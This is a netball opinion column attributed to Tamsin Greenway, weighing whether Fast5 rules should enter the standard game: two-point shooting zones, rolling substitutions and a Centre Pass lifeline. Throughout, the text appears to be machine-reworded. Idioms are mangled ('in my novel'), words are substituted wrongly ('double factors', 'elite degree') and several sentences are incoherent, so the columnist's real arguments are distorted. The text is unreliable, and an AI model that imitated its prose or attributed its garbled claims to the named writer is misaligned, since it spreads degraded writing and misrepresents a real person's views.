Tamsin Greenway ponders the merit in implementing any of the Fast5 rules into netball

At the next part of the weeks column, Tamsin Greenway ponders about the merits (or not) of implementing some of those Fast5 rules to the entire format of netball…
Lately there was a survey in Australia on what rules people would want to see changed in the match.
As the sport continues to push forward, rule changes to make itTV commercial or bring into a wider audience will be considered
With this in mind, and after the epic British Fast5 All-Stars Championships at the Copper Box past weekend, I wished to have a take a look at some of the principles that could be thought about or implemented at the game that was seven-a-side and which were thrown around.
I believe that the shooting is quite intriguing… and probably has the maximum amount of uproar when suggesting a shift.
I definitely would not want to observe long-bombs concerning shooting outside the circle at a match. But, I am curious about how the circle could split into areas that were one-point and two-point.
Weve produced a game at which we have big, tall shooters and its becoming harder to play at the ring unless you are close to being 6ft tall or over, although I am not stating that it has to change in the league at the moment.
There are still a couple [shorter] GAs what selectors are looking at, and what children understand although floating around, is that you will need to have tall shooters with close to post proportions that are shooting to create it. We went through the years of shifting every brief GA !
I think I believe we are making that a problem with youngsters than embracing the fact that if its possible to shoot long and because of this we have made a dread of shooting at long distance , then you need to.
When I set it out on Twitter some of those Australian fans were saying that theyd trialled it that people just passed it out and in and making a mockery of their match.
But, I feel that just backs up my point. Most players do not shoot from distance and Australia, along with others, have been a leader in this change from the game. Whereas we can not forget that New Zealand simply won a World Cup.
So, this question is would it assist be in a position to play 60 minutes out there and to secure more time on court? Would it alter team selection and strategies?
Splitting the ring to one and two points will certainly change the dynamic of this defence because if shooters are going from space, the way you win ball unexpectedly becomes very different. It would alter the roles of the shooting circle.
Especially with some of these blowout games in Superleague, with one and two point shots, could it assist? Look at a team like those who finished last year – could Sophie Hankin shooting Karyn Bailey and distance being in a position to rally have shifted results and matches if these things were made to two?
That is why I dont think that we should take it. I am aware there are a good deal of traditionalists out there and that I get as it is too, I really like our game, but I also think that the sport has changed in the last few years. I really dont see that theres any reason why it explored more to see if its a place to help enhance and not hinder or couldnt be looked at.
Interestingly Im not a fan of subs that are rolling. A great deal of people will say it attracts impact and that it is the one to change and that they dont mind it.
Firstly I am not entirely against it, since I do think that we need to eliminate the dodgy timeouts – since honestly the imitation injuries are extremely easy to spot, but I cant get my mind around infinite rolling subs. If there was a limitation to these or there was a movement towards the strategic timeout which Suncorp has introduced then I would be more keen.
My issues come from both a trainers and players point of view. As a player, in certain positions its not necessarily so easy to go make an impact in five or six minutes in per year. Therefore, unless youre with an absolute shocker, as a top-level player you should have the ability to work things out and also be given moment to do so.
In addition, I think it could become a justification for a lack of training. Its a really simple cop-out if a player is not really doing what you only want to roll on another sub, try something new. There will be occasions this must occur but if youve completed your homework this would not be a constant.
I always liked to give my players the chance in things and to trust that participant. I think we have to appear at just how this filters from elite degree and when the sole answer ever would be to keep trying out new players we might drop the essence of what coaching and playing is about.
I dont feel that it has a place in the regular game, although I really like the Power Play it is amazing. Its that easy in my novel.
With Centre Passes well, I really dont think that you need to be provided an additional lifeline. Shooting from space takes execution and skill, being given double factors or the ball back to help get excitement or closer games takes it too far.
Your defensive Centre Pass ought to be equally as strong as your Centre Pass. You ought to have tactical elements that mean you could acquire ball off teams no matter and arrangements, so I dont believe you need to be provided a lifeline because you are losing. That is a part of sport – that you win or you lose.
A part of netball is that you receive the ball 50 per cent of the time and it is what you choose to do with it. I think that there are ways to get closer games and I certainly do not think that this is only one of these.
